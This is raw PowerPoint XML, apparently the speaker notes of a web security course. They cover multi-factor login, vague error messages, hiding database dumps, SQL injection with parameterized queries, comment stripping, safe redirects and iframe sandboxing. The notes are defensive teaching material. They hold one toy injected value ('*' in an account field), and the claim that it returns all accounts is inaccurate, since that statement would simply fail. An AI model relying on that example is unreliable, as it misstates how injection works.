            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> to be “correct” for access.  For example, physical access may require swiping a card in a reader AND supplying a PIN on a keypad.  Stealing just the card, or determining just the PIN by watching the keypad won’t get you through the checkpoint.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>For online systems, you may require a password and a fingerprint, or a fingerprint and a one-time-key provided by a fob/token or cell phone, or all 3 (fingerprint, cellphone key, and password).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32</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6331130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information is accidentally</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> leaked when you’re just trying to be helpful.  For example, if a user enters a valid </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>userID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>, but an incorrect password on a logon screen, the error message should </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" baseline="0" dirty="0" smtClean="0"/>
              <a:t>NOT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>be “incorrect password”, as this tips off an attacker that they (probably) have a valid ID, and just need to figure out a password (time to try some from the previous lists…). This is bad, because passwords are very often not that difficult to crack (Safety Rule #9 above). </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>This is an example of the application being “too helpful”.  By politely informing a legitimate user that they probably “fat fingered” their password, you have inadvertently provided an attacker with some useful information – namely that they have (probably) discovered a “good” ID.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>INSTEAD – you should </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" baseline="0" dirty="0" smtClean="0"/>
              <a:t>be deliberately vague with ALL error messages presented to users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>.  For this example, instead of displaying “invalid password”, simply state “invalid logon – please try again”.  Now the attacker doesn’t know if the ID is bad, the password is bad, or both are bad.  And make certain that the error message is displayed from the same page (URL) for either error – otherwise you are still leaking information even though the message text is identical for bad ID and bad password…(a skilled attacker will notice that the URL for a bad </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>userid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> is different from the URL for the bad password…even though the text of the error is exactly the same)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>For added safety, set a counter and limit the number of re-tries.  This will hinder any “brute force” attempts to crack your site – the attacker won’t be able to run the “Top 25” passwords if you cut them off at 3 tries…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Also, Other “leaks” can occur when you’re too helpful. For example, if a unauthorized user attempts to access a secure web page, your web server will (by default – unless you alter this) handle this access by “helpfully” issuing this message:  “401 – Unauthorized” . Again, for legitimate users, this is helpful, in that it alerts them to the fact that they may need to log off and back on with their “admin” credentials (if they are really supposed to be able to access this page).  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>But for an attacker, this message highlights a URL of high potential… time to fingerprint the site (if not already done) and leverage any known exploits to get into that page…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>INSTEAD – intercept –ALL– (major) HTTP error pages and substitute your own “more vague” error pages. Instead of “403 – Forbidden”, or “401 Not Authorized”, simply display your custom “404 – Not Found” page in its place (it is ok – and in this case, preferable – to lie…). This will not tip off the attacker that “something good lies within”.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>For some  ideas, look here:  http://www.sitepoint.com/craft-perfect-404-page/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33</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11013947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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> of a database error that was displayed to the user.  If the user was an attacker, they may have been attempting to “fuzz” input to see if they could force a SQL injection (This “helpful” dump tells the attacker exactly what they did incorrectly (1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0" smtClean="0"/>
              <a:t>st</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> line) so that the attacker can easily make appropriate corrections and try again. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>In addition, by following the call trace (or “stack dump” if you prefer), the attacker can glean knowledge about the application itself – you may not see much of use in this dump, but an attacker will know what to look for (and leverage) – determine which database you are using, see what framework(s) you are using by the calls shown in the stack, etc..</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>So intercept and soften the errors – display a more “generic” error message that won’t give an attacker a “leg up”.  For example, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" baseline="0" dirty="0" smtClean="0"/>
              <a:t>do NOT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>replace the above dump with an error message like: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;span id="Message"&gt;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nbsp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>; &amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nbsp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>; An Error has occurred: Unclosed quotation mark after the character string ')/&gt;''.&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>br</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> /&gt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>br</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> /&gt;&lt;/span&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Instead simply</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> state something simple and vague – like :</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;span id="Message"&gt;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nbsp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>; &amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nbsp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>No Record Found</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>br</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> /&gt;&lt;/span&gt;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34</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34476616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very easy to construct an</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> SQL statement as a “character string”, then throw the result at the SQL interpreter for execution. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>For example, a form field may contain an account number that has been extracted from the form and “plugged in” to an SQL statement string, then the entire string is sent to the database for interpretation/execution.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" baseline="0" dirty="0" smtClean="0"/>
              <a:t>BUT DON’T EVER DO THAT!!!</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C20B865-30AA-490B-91EC-B55FD200A00E}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>35</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1977000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example, “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>account_number</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>” represents the value taken directly from the form.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>And</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“+” represents string concatenation in this programming language.  If the form field that was</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> assigned to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>account_number</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> variable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>actually contained an account number – like “123456789”, the resulting SQL statement would be:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Select name, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>accountnum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, balance from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>CheckingAccount</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>accountnum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> = 123456789;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>And the checking account record would be returned ( or an error, if this account doesn’t exist).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>However, if I can enter something else in the account number field of the form (which, as we have seen, is fairly easy to do using proxies like Fiddler), I might choose to enter something like “*” in place of the account number, which would result in this SQL statement generation:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Select name, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>accountnum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, balance  from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>CheckingAccount</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>accountnum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> = *;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Which has a completely different result…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>I could similarly provide “helpful” modifications to any SQL.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Parameterized SQL bypasses this problem, because you first parse a skeleton statement like this:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Select name, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>accountnum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, balance  From </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>CheckingAccount</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>accountnum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> = ?;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Where the “?” is “compiled” by the interpreter as a placeholder, and later you provide the data that will be substituted for the placeholder when the statement is executed (NOT re-interpreted – the interpreter won’t touch this statement at execution time).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The result is that if I supply “*” as an account number that is then used in a pre-parsed SQL statement, the asterisk will be used as DATA, and NOT be interpreted as part of the SQL statement – so in this case, the SQL execution will attempt to find the account with account number “*” (which will likely fail…) INSTEAD of returning ALL accounts (as the non-parameterized version did).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Watch the video: https://www.youtube.com/watch?v=pypTYPaU7mM&amp;list=PL8239DA448CC2BB7C&amp;index=2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36</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9595126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Comments are</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> usually supplied in code (HTML or script code) to assist programmers.  For developers, these comments can refresh some details about “what’s going on” in the code.  Many times, they will reveal (or at least hint at) internal structure, algorithms, database schema, etc.  All of this information can be exceedingly helpful to an attacker, especially during the RECON phase of the attack.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>All comments should be stripped from all code when the code is deployed to production.  There are many utilities available to do this.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>As an added benefit, removing the comments will make your code smaller.  As a result, it will load faster (fewer bytes to transfer across the wire), AND execute faster (although the comments are not executed, both HTML and JavaScript are interpreted, so the parser has to scan all of those comments in order to find the next piece of  executable code.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>The Google CLOSURE compiler will remove all “white space” from your JavaScript, including comments AND make your code “better” (with appropriate option set), – </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>https://developers.google.com/closure/compiler/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>HTML (if using CHROME</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> browser): https://developers.google.com/speed/docs/insights/MinifyResources</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Yui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> compressor - http://yui.github.io/yuicompressor/ </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Add comment &amp; whitespace elimination (compression) as a step in your deployment script (so you can keep comments, etc., in your development stuff) NOTE that some packages require you to leave “copyright” notice, so you may have to add them back (some </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>minifiers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> have a way to “flag” comments that should be left in, like the mandatory “Copyright”, and remove the rest of the comments…)</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37</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18865896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un-validated/un-sanitized user input to redirect/forward sessions can send your users to phishing and malware sites. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Safest is to avoid redirects/forwards completely. Problem solved…  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Next best is to “hard-code” destinations if you must redirect/forward for any reason.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>If</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> you must (for some reason) include any user data in a redirect </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>, re-think your design!!! </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>If you still MUST, then at least validate the user data to determine that the “end result” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> will be someplace that you intend your user to visit. Perhaps a table of valid destinations that you can check to ensure that an attacker hasn’t tricked your server into transferring you to “evilhackersite.com”…</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38</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35439470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don’t have (very much, if any) control over assets obtained from other sites. Even if the site is “reputable”, they may not be rigorous with their validation/sanitization, and THEY may have been hacked. If so, there’s no telling what state the assets (that you may have meticulously researched only a few months ago…) are currently in.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Isolating foreign assets to a sandboxed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> will at least isolate their potentially problematic JavaScript, Flash, etc. The sandboxed iframe has (if there are no browser bugs, which has not always held true in the past…) a context (local storage, DOM, CSS, JavaScript)  separate from the parent window, so (in theory) anything running in the iframe can’t affect the “owning” window. Only “in theory”… but better than nothing.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Even big name, reputable ad networks (DoubleClick, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Zedo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>) have unintentionally distributed malware in ads (see: http://www.networkworld.com/article/2686393/malicious-advertisements-distributed-by-doubleclick-zedo-networks.html?source=NWWNLE_nlt_security_2014-09-22#tk.rss_security )</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>See also: 	http://www.acunetix.com/blog/web-security-zone/elaborate-ways-exploit-xss-flash-parameter-injection/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>	https://www.tinfoilsecurity.com/blog/protect-your-website-from-embedded-content-iframe-security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>So ISOLATE them – and any assets over which you have no control - in an iframe</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39</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="240179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large $$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> amounts available from unethical hacking, there is a market for attack tools. Because there is a market, many talented programmers are researching new techniques to “break in” to web sites, and are developing new tools to assist in that endeavor. There are new exploits discovered daily.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Many attack tools are available on the web – FOR FREE – including:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Proxies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Network scanners</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
